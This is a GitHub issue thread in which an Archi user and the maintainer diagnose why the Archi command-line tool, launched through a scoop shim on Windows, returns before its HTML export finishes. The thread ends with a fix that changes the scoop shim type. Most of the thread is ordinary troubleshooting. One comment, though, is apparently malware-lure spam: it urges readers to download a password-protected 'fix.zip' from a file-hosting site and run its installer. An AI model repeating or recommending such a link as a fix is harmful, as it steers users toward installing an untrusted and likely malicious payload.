### ISSUE TITLE
[ACLI] calling Archi CLI (through scoop shim) returns immediately instead of blocking until done

### ISSUE THREAD

**Issue by ogerardin** [archimatetool/archi#1067]
### Archi Version

5.3.0

### Operating System

Windows 11

### Description

I invoke the Archi CLI from a script to generate the HTML report, and then do some processing on the generated files.
Previously when I called "Archi" the command did not return until the export was done, and then processing could take place.
Now since a recent update, calling "Archi" returns immediately and the HTML export is generated in parallel, so the processing starts before it's completed.

I haven't been able to confirm this behaviour on Linux.

Running in git-bash, my ugly workaround is:
```
case "$OS" in
  Windows*) while WMIC path win32_process get Commandline | grep -v grep | grep com.archimatetool.commandline.app >/dev/null ; do sleep 1 ; done
    ;;
esac

```

### Steps to reproduce

From a shell in an archi collaboration repo, run: `Archi -application com.archimatetool.commandline.app -consoleLog -nosplash --modelrepository.loadModel . --html.createReport output/html`

**Comment by Phillipus** [comment]
Nothing has changed in Archi concerning CLI recently. I tried the following in git bash and it works as expected:

`"C:\Program Files\Archi\Archi.exe" -application com.archimatetool.commandline.app -consoleLog -nosplash --modelrepository.loadModel . --html.createReport output/html`

Perhaps it has something to do with how your script is calling the CLI?

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ogerardin** [comment]
> Nothing has changed in Archi concerning CLI recently. I tried the following in git bash and it works as expected:
That's weird. You mean it blocked until the export was finished?

> Perhaps it has something to do with how your script is calling the CLI?
Nothing special really, and the weird thing is it behaves the same if called in a bash script that I run in git-bash, or if I run it manually from the Windows prompt. 

Other than updating to Archi 5.3.0 the only other thing I can think of is that my laptop was updated to Windows 11 from Windows 10.

**Comment by Phillipus** [comment]
How are you calling the Archi CLI command from a batch file, Powershell script or other? When I call the command from a script using git bash the command does not return until completed. I'm on Windows 11.

**Comment by Phillipus** [comment]
Do you see the messages written to console like "Creating report from...", "Copying files...", "Report generated!", etc?

You can add the `-p` switch to the ACLI to pause out put and get the "Press RETURN to continue" prompt.

**Comment by ogerardin** [comment]
> How are you calling the Archi CLI command from a batch file, Powershell script or other? When I call the command from a script using git bash the command does not return until completed. I'm on Windows 11.

From a git-bash script, but I observe the same behaviour when I call the command directly from a Windows command prompt or a git-bash shell.

**Comment by ogerardin** [comment]
> Do you see the messages written to console like "Creating report from...", "Copying files...", "Report generated!", etc?

These messages are displayed in another windows that opens when Archi is called. It was also the case before, that's why I didn't mention it, except that before it wouldn't return to the caller until its job was finished.

> You can add the `-p` switch to the ACLI to pause output and get the "Press RETURN to continue" prompt.

If I add `-p` then the "Press RETURN to continue" prompt is displayed in this additional window.

**Comment by Phillipus** [comment]
Whatever I try the command does its thing and then returns.

1. I created a script file called `run.sh` in the repo folder:

```bash
ARCHI='C:\Program Files\Archi\Archi.exe'
"${ARCHI}" -application com.archimatetool.commandline.app -consoleLog -nosplash --modelrepository.loadModel . --html.createReport output/html
ret=$?
echo $ret
```
2. I run this from a git bash shell with `sh run.sh`
3. A console window opens and I see the log messages from the command. This takes a few seconds to run.
4. The return code of "0" is written to the bash shell

In all cases the CLI does not return until it has finished.

**Comment by ogerardin** [comment]
> In all cases the CLI command does not return until it has finished.

I did the same (adjusting for Archi.exe path) and here's what happens:

1. I run this from a git bash shell with sh run.sh
2. A console window opens and starts showing log messages from the command. 
3. The return code of "0" is written to the bash shell and it returns to the prompt
4. The CLI command continues running in the console windows for a few seconds and then the window closes

I have no idea what could cause this behaviour.
Archi was installed using scoop but the [manifest ](https://github.com/ScoopInstaller/Extras/blob/master/bucket/archi.json) downloads the binary from archimatetool.com so I doubt it would be the cause.

**Comment by Phillipus** [comment]
> I have no idea what could cause this behaviour.

Me neither. Whatever I try I can't reproduce your issue either from a git bash shell or the Windows command shell.

Are you sure you're not running some command somewhere that runs the script asynchronously?

**Comment by ogerardin** [comment]
> Are you sure you're not running some command somewhere that runs the script asynchronously
Yes, it happens also if I run the script from the bash prompt directly. It's only Archi that runs asynchronously.

I did additional experiments and installed Archi from the zip (instead of through scoop):

- when called from a script executed by git-bash or from the git-bash prompt: the behaviour is now correct 
- when run from the Windows prompt or PowerShell I still have the same behaviour: archi returns control to the prompt and continues to run in parallel

I would blame scoop but it doesn't explain why the odd behaviour is still present when archi is invoked from the Windows command line...

**Comment by Phillipus** [comment]
No idea why this is the case.

What about just running the Archi app from git bash, does that return immediately?

```bash
ARCHI='C:\Program Files\Archi\Archi.exe'
"${ARCHI}"
```

**Comment by Phillipus** [comment]
> when run from the Windows prompt or PowerShell I still have the same behaviour

It seems that Windows PS and Terminal won't wait for the process to finish. Same for any app invoked that way.

**Comment by Phillipus** [comment]
> PS: scoop uses a "shim" mechanism where shims for all installed commands are created in C:\User\xxx\scoop\shims, which avoids PATH pollution, and each shim in turn invokes the actual binary, in this case C:\User\xxx\scoop\apps\archi\current\archi.exe
If I call directly C:\User\xxx\scoop\apps\archi\current\archi.exe then I observe the correct behaviour, so it's definitely the shim that exits prematurely for some reason.

That's why I don't recommend downloading Archi from these types of installers. They can cause hidden issues that I end up spending days wasting time diagnosing the problem.

**Comment by Phillipus** [comment]
If you want to wait for the process to finish using PowerShell do something like this:

```
Start-Process -FilePath "C:\pathTo\Archi.exe" -Wait -ArgumentList "-application com.archimatetool.commandline.app -consoleLog -nosplash --modelrepository.loadModel . --html.createReport output/html"
```

**Comment by ogerardin** [comment]
> What about just running the Archi app from git bash, does that return immediately?
> 
> ```shell
> ARCHI='C:\Program Files\Archi\Archi.exe'
> "${ARCHI}"
> ```

No, when invoking the archi app directly (not the scoop shim) it does not return immediately.

**Comment by ogerardin** [comment]
> It seems that Windows PS and Terminal won't wait for the process to finish. Same for any app invoked that way.

Ideally the archi CLI would be a true console app and not need to start its own console Window, but I suppose there's a good reason why it does.

**Comment by ogerardin** [comment]
> That's why I don't recommend downloading Archi from these types of installers. They can cause hidden issues.

Usually scoop is the best way to install command line utilities for Windows, but since Archi is a GUI app that can be used as a CLI, that might confuse scoop. I could report this issue on the scoop side but I don't think there's any type of control over the generated shim so there's probably nothing they can do.

**Comment by Phillipus** [comment]
I think this issue has been solved.

Running from git bash is working if the Archi executable is called directly. Calling Archi, or any other process, from Windows Terminal or PS requires additional arguments as shown in https://github.com/archimatetool/archi/issues/1067#issuecomment-2318083705

> Ideally the archi CLI would be a true console app and not need to start its own console Window,

Not possible. It is calling Archi in "headless" mode (non-UI).

**Comment by ogerardin** [comment]
> If you want to wait for the process to finish using PowerShell do something like this:
> 
> ```
> Start-Process -FilePath "C:\pathTo\Archi.exe" -Wait -ArgumentList "-application com.archimatetool.commandline.app -consoleLog -nosplash --modelrepository.loadModel . --html.createReport output/html"
> ```

Thanks, I'll keep this for reference but I don't work wit PS. 
The bash script has the advantage of working also under Linux and allowing me to dockerize it.

**Comment by ogerardin** [comment]
Running from git bash is working if the Archi executable is called directly, so closing this issue as scoop-related.
Also updated the title to reflect the situation.

**Comment by ogerardin** [comment]
After some searching on the Scoop side, I've found that you can actually configure which type of shim is used.
In Archi's case, the problem is solved by using the so-called "71" shim as follows:
```
scoop config shim 71
scoop reset archi
```
After doing that, the shim behaves as expected and does not exit until the Archi executable has finished.
